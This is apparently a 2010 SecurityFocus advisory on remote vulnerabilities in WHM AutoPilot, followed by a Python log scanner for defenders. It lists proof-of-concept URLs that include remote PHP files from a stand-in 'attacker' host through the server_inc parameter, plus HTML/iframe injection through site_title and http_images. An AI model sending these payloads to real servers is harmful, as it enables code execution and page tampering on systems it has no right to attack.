Benchmark Designs WHM AutoPilot Multiple Remote Vulnerabilities

An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/inc/header.php/step_one.php?server_inc=http://attacker/step_one_tables.php

http://www.example.com/inc/step_one_tables.php?server_inc=http://attacker/js_functions.php

http://www.example.com/inc/step_two_tables.php?server_inc=http://attacker/js_functions.php

http://www.example.com/inc/header.php?site_title=%3C/title%3E%3Ciframe%3E

http://www.example.com/admin/themes/blue/header.php?http_images='%3E%3Ciframe%3E
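
For defenders reviewing web server access logs, the following added example (not part of the original advisory) flags requests shaped like the proof-of-concept URLs above: an absolute URL in server_inc, or HTML markup in site_title or http_images. The log format, the sample lines and the function names are assumptions made for this illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter names taken from the proof-of-concept URLs on this page.
URL_PARAMS = {"server_inc"}                     # carried an absolute URL
MARKUP_PARAMS = {"site_title", "http_images"}   # carried encoded HTML markup

REMOTE_SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)
MARKUP = re.compile(r"[<>]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (bounded) so %253C is handled like %3C."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(request_target):
    """Return sorted findings for one request target (path plus query)."""
    findings = set()
    query = urlsplit(request_target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        name, value = name.lower(), fully_decode(value)
        if name in URL_PARAMS and REMOTE_SCHEME.match(value):
            findings.add(f"remote-url-in:{name}")
        if name in MARKUP_PARAMS and MARKUP.search(value):
            findings.add(f"markup-in:{name}")
    return sorted(findings)

def scan(log_lines):
    """Yield (line_number, findings) for access-log lines that match."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match and (hits := classify(match.group(1))):
            yield number, hits

# Constructed sample lines in combined log format; not real traffic.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /inc/step_one_tables.php?server_inc=http://attacker/js_functions.php HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /inc/header.php?site_title=My+Hosting HTTP/1.1" 200 2048',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /inc/header.php?site_title=%3C/title%3E%3Ciframe%3E HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE):
        print(number, hits)
```
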


 

Copyright 2010, SecurityFocus